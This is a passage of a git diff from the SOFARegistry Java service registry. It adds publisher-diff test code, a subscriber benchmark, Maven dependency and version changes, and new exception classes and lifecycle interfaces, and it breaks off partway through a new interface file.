Assert.assertEquals(result.getUpdatedPublishers().get("d").get(0), addD); + + DataSlotDiffUtils.logDiffResult(result, 10); + + // reach max + result = DataSlotDiffUtils.diffPublishersResult(summaryMap.values(), publishers, 1); + Assert.assertTrue(result.isHasRemain()); + Assert.assertTrue(result.getRemovedPublishers().get("b").size() == 1); + Assert.assertEquals(result.getRemovedPublishers().get("b").get(0), removedB.getRegisterId()); + + Assert.assertTrue( + result.getUpdatedPublishers().containsKey("c") + || result.getUpdatedPublishers().containsKey("d")); + + Assert.assertEquals(result.getUpdatedPublishers().size(), 1); + + if (result.getUpdatedPublishers().containsKey("c")) { + Assert.assertEquals(result.getUpdatedPublishers().get("c").size(), 1); + Assert.assertEquals(result.getUpdatedPublishers().get("c").get(0), modifyC); + } + + if (result.getUpdatedPublishers().containsKey("d")) { + Assert.assertEquals(result.getUpdatedPublishers().get("d").size(), 1); + Assert.assertEquals(result.getUpdatedPublishers().get("d").get(0), addD); + } + DataSlotDiffUtils.logDiffResult(result, 10); + } + + private static void checkAddedPublisher( + Map> publishers, DataSlotDiffPublisherResult result) { + for (Map.Entry> e : result.getUpdatedPublishers().entrySet()) { + Map publisherMap = publishers.get(e.getKey()); + Assert.assertEquals(publisherMap.size(), e.getValue().size()); + for (Publisher p : e.getValue()) { + Assert.assertTrue(p == publisherMap.get(p.getRegisterId())); + } + } + } + + private static void checkUpdatedSize(Map m, DataSlotDiffPublisherResult result) { + for (Map.Entry e : m.entrySet()) { + List publisherList = result.getUpdatedPublishers().get(e.getKey()); + if (publisherList != null) { + Assert.assertEquals(e.getValue().intValue(), publisherList.size()); + } + } + } + + private static Publisher randPublisher() { + Publisher p = new Publisher(); + p.setRegisterTimestamp(System.nanoTime()); + p.setRegisterId(System.currentTimeMillis() + "_" + SEQ.incrementAndGet()); + p.setVersion(1L); + return p; + } + + private static Map> randPublishers( + Map publishers) { + Map> m = Maps.newHashMap(); + publishers.forEach( + (k, i) -> { + Map publisherMap = Maps.newHashMap(); + for (int j = 0; j < i; j++) { + Publisher p = randPublisher(); + publisherMap.put(p.getRegisterId(), p); + } + m.put(k, publisherMap); + }); + return m; + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/store/SubTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/store/SubTest.java new file mode 100644 index 000000000..027d92b44 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/store/SubTest.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.google.common.collect.Maps; +import java.util.Map; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-26 11:46 yuzhi.lyz Exp $ + */ +public class SubTest { + + static final int count = 500; + static final int tests = 1000000; + static final String dataCenter = "abcdefgaaaaaaa"; + static final int ver = 0; + + public static void main(String[] args) { + Map subs = Maps.newConcurrentMap(); + initMap(subs, count); + for (int i = 0; i < tests; i++) { + test1(subs, dataCenter, ver); + } + long start = System.currentTimeMillis(); + for (int i = 0; i < tests; i++) { + test1(subs, dataCenter, ver); + } + long end = System.currentTimeMillis(); + System.out.println("@@" + (end - start)); + } + + private static boolean test1(Map map, String dataCenter, long ver) { + for (Subscriber s : map.values()) { + if (s.checkVersion(dataCenter, ver)) { + return true; + } + } + return false; + } + + private static void initMap(Map map, int count) { + String key = String.valueOf(System.currentTimeMillis()); + for (int i = 0; i < count; i++) { + Subscriber sub = new Subscriber(); + sub.checkVersion(dataCenter, 10L); + map.put(key + "_" + i, sub); + } + } +} diff --git a/server/common/pom.xml b/server/common/pom.xml index 9027270dc..1eddf4d50 100644 --- a/server/common/pom.xml +++ b/server/common/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/common/util/pom.xml b/server/common/util/pom.xml index 827af0b6e..95d92e7d8 100644 --- a/server/common/util/pom.xml +++ b/server/common/util/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-common - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -20,7 +20,6 @@ org.slf4j slf4j-api - provided com.alipay.sofa.common @@ -43,19 +42,65 @@ metrics-core - ch.qos.logback - logback-classic - test + io.prometheus + simpleclient + - ch.qos.logback - logback-core - test + io.prometheus + simpleclient_hotspot + + + + io.prometheus + simpleclient_httpserver + + + io.prometheus + simpleclient_dropwizard io.netty netty-all + + org.glassfish.jersey.media + jersey-media-json-jackson + + + commons-lang + commons-lang + + + + org.springframework.boot + spring-boot-starter-log4j2 + + + org.springframework + spring-core + + + org.mockito + mockito-core + test + + + + + org.apache.maven.plugins + maven-jar-plugin + + + + test-jar + + + + + + + diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/converter/ScopeEnumConverter.java b/server/common/util/src/main/java/com/alipay/sofa/registry/converter/ScopeEnumConverter.java index 8eac5128d..8e2b73bd4 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/converter/ScopeEnumConverter.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/converter/ScopeEnumConverter.java @@ -19,21 +19,21 @@ import com.alipay.sofa.registry.core.model.ScopeEnum; /** - * * @author zhuoyu.sjw * @version $Id: ScopeEnumConverter.java, v 0.1 2018-03-01 21:08 zhuoyu.sjw Exp $$ */ public class ScopeEnumConverter { - /** - * scope convert func - * @param name - * @return - */ - public static ScopeEnum convertToScope(String name) { - if (ScopeEnum.contains(name)) { - return ScopeEnum.valueOf(name); - } - return ScopeEnum.zone; + /** + * scope convert func + * + * @param name + * @return + */ + public static ScopeEnum convertToScope(String name) { + if (ScopeEnum.contains(name)) { + return ScopeEnum.valueOf(name); } + return ScopeEnum.zone; + } } diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/datacenter/DataCenterAware.java b/server/common/util/src/main/java/com/alipay/sofa/registry/datacenter/DataCenterAware.java new file mode 100644 index 000000000..b96fefe86 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/datacenter/DataCenterAware.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.datacenter; + +/** + * @author chen.zhu + *

Nov 19, 2020 + */ +public interface DataCenterAware { + String getDc(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/DisposeException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/DisposeException.java new file mode 100644 index 000000000..8542bd1e6 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/DisposeException.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class DisposeException extends SofaRegistryRuntimeException { + public DisposeException(String message) { + super(message); + } + + public DisposeException(String message, Throwable th) { + super(message, th); + } + + public DisposeException(Throwable th) { + super(th); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/InitializeException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/InitializeException.java new file mode 100644 index 000000000..fd63b6396 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/InitializeException.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class InitializeException extends SofaRegistryRuntimeException { + + public InitializeException(String message) { + super(message); + } + + public InitializeException(String message, Throwable th) { + super(message, th); + } + + public InitializeException(Throwable th) { + super(th); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/MetaLeaderQueryException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/MetaLeaderQueryException.java new file mode 100644 index 000000000..a3d93853d --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/MetaLeaderQueryException.java @@ -0,0 +1,27 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author xiaojian.xj + * @version $Id: MetaLeaderQueryException.java, v 0.1 2021年03月22日 14:30 xiaojian.xj Exp $ + */ +public class MetaLeaderQueryException extends SofaRegistryRuntimeException { + public MetaLeaderQueryException(String message, Throwable cause) { + super(message, cause); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryMetaLeaderException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryMetaLeaderException.java new file mode 100644 index 000000000..92071254e --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryMetaLeaderException.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public class SofaRegistryMetaLeaderException extends SofaRegistryRuntimeException { + + private final String leader; + + private final long epoch; + + public SofaRegistryMetaLeaderException(String leader, long epoch, String message) { + super(message); + this.leader = leader; + this.epoch = epoch; + } + + /** + * Getter method for property leader. + * + * @return property value of leader + */ + public String getLeader() { + return leader; + } + + /** + * Getter method for property epoch. + * + * @return property value of epoch + */ + public long getEpoch() { + return epoch; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryRuntimeException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryRuntimeException.java new file mode 100644 index 000000000..20632d545 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistryRuntimeException.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class SofaRegistryRuntimeException extends RuntimeException { + + public SofaRegistryRuntimeException(String message) { + super(message); + } + + public SofaRegistryRuntimeException(String message, Throwable cause) { + super(message, cause); + } + + public SofaRegistryRuntimeException(Throwable cause) { + super(cause); + } + + public SofaRegistryRuntimeException( + String message, Throwable cause, boolean enableSuppression, boolean writableStackTrace) { + super(message, cause, enableSuppression, writableStackTrace); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistrySlotTableException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistrySlotTableException.java new file mode 100644 index 000000000..b0910fafd --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/SofaRegistrySlotTableException.java @@ -0,0 +1,27 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Jan 26, 2021 + */ +public class SofaRegistrySlotTableException extends SofaRegistryRuntimeException { + public SofaRegistrySlotTableException(String message) { + super(message); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StartException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StartException.java new file mode 100644 index 000000000..28f446413 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StartException.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class StartException extends SofaRegistryRuntimeException { + + public StartException(String message) { + super(message); + } + + public StartException(String message, Throwable th) { + super(message, th); + } + + public StartException(Throwable th) { + super(th); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StopException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StopException.java new file mode 100644 index 000000000..dc5923dab --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/exception/StopException.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.exception; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class StopException extends SofaRegistryRuntimeException { + public StopException(String message) { + super(message); + } + + public StopException(String message, Throwable th) { + super(message, th); + } + + public StopException(Throwable th) { + super(th); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Disposable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Disposable.java new file mode 100644 index 000000000..50a6e9edd --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Disposable.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +import com.alipay.sofa.registry.exception.DisposeException; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface Disposable { + + void dispose() throws DisposeException; +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Initializable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Initializable.java new file mode 100644 index 000000000..b956c7705 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Initializable.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +import com.alipay.sofa.registry.exception.InitializeException; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface Initializable { + + void initialize() throws InitializeException; +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Lifecycle.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Lifecycle.java new file mode 100644 index 000000000..01992a5d4 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Lifecycle.java @@ -0,0 +1,24 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface Lifecycle + extends Initializable, Startable, Stoppable, Disposable, LifecycleStateAware {} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleController.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleController.java new file mode 100644 index 000000000..caf7b0441 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleController.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface LifecycleController { + + boolean canInitialize(LifecycleState.LifecyclePhase phase); + + boolean canStart(LifecycleState.LifecyclePhase phase); + + boolean canStop(LifecycleState.LifecyclePhase phase); + + boolean canDispose(LifecycleState.LifecyclePhase phase); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleState.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleState.java new file mode 100644 index 000000000..641304abc --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleState.java @@ -0,0 +1,114 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface LifecycleState { + + boolean isEmpty(); + + boolean isInitializing(); + + boolean isInitialized(); + + boolean isStarting(); + + boolean isStarted(); + + boolean isStopping(); + + boolean isStopped(); + + boolean isPositivelyStopped(); + + boolean isDisposing(); + + boolean isDisposed(); + + boolean isPositivelyDisposed(); + + LifecyclePhase getPhase(); + + void setPhase(LifecyclePhase phase); + + /** rollback to previous state */ + void rollback(Exception e); + + boolean canInitialize(); + + boolean canStart(); + + boolean canStop(); + + boolean canDispose(); + + enum LifecyclePhase { + INITIALIZING { + @Override + LifecyclePhase next() { + return INITIALIZED; + } + }, + INITIALIZED { + @Override + LifecyclePhase next() { + return STARTING; + } + }, + STARTING { + @Override + LifecyclePhase next() { + return STARTED; + } + }, + STARTED { + @Override + LifecyclePhase next() { + return STOPPING; + } + }, + STOPPING { + @Override + LifecyclePhase next() { + return STOPPED; + } + }, + STOPPED { + @Override + LifecyclePhase next() { + return DISPOSING; + } + }, + DISPOSING { + @Override + LifecyclePhase next() { + return DISPOSED; + } + }, + DISPOSED { + @Override + LifecyclePhase next() { + return INITIALIZING; + } + }; + + abstract LifecyclePhase next(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleStateAware.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleStateAware.java new file mode 100644 index 000000000..7068f31c4 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LifecycleStateAware.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface LifecycleStateAware { + + LifecycleState getLifecycleState(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LiteLifecycle.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LiteLifecycle.java new file mode 100644 index 000000000..ca7e3c8b9 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/LiteLifecycle.java @@ -0,0 +1,23 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public interface LiteLifecycle extends Startable, Stoppable {} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Startable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Startable.java new file mode 100644 index 000000000..511b73e30 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Startable.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +import com.alipay.sofa.registry.exception.StartException; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface Startable { + + void start() throws StartException; +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Stoppable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Stoppable.java new file mode 100644 index 000000000..e1bdd8d04 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Stoppable.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +import com.alipay.sofa.registry.exception.StopException; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface Stoppable { + + void stop() throws StopException; +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Suspendable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Suspendable.java new file mode 100644 index 000000000..bf367d788 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/Suspendable.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle; + +/** + * @author chen.zhu + *

